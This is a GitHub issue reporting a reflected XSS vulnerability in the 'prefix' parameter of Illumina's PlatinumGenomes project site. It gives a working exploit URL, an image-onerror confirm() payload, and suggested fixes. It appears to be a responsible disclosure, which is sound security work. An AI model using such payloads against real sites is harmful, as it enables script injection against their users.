Found Reflected XSS On your Site - Githubissues

Illumina / PlatinumGenomes

The Platinum Genomes Truthset

https://illumina.github.io/PlatinumGenomes

84 stars 9 forks source link

Found Reflected XSS On your Site #12

Open xElkomy opened 3 years ago

xElkomy commented 3 years ago

Hello Security Team today I found Reflected XSS on your own website

Steps:-

1-Got this Url: https://illumina.github.io/PlatinumGenomes/?prefix= 2-Add Payload XSS In Parameter prefix Done Exploit

Example:-

https://illumina.github.io/PlatinumGenomes/?prefix=1%27%22%3CImg%20Src%20OnError=confirm(%27xElkomy%27)%3E

payload:

1'"<Img Src OnError=confirm('xElkomy')>

Fix:-

Delete the reflect for prefix parameter Filter input on arrival Encode data on output Use appropriate response headers Content Security Policy.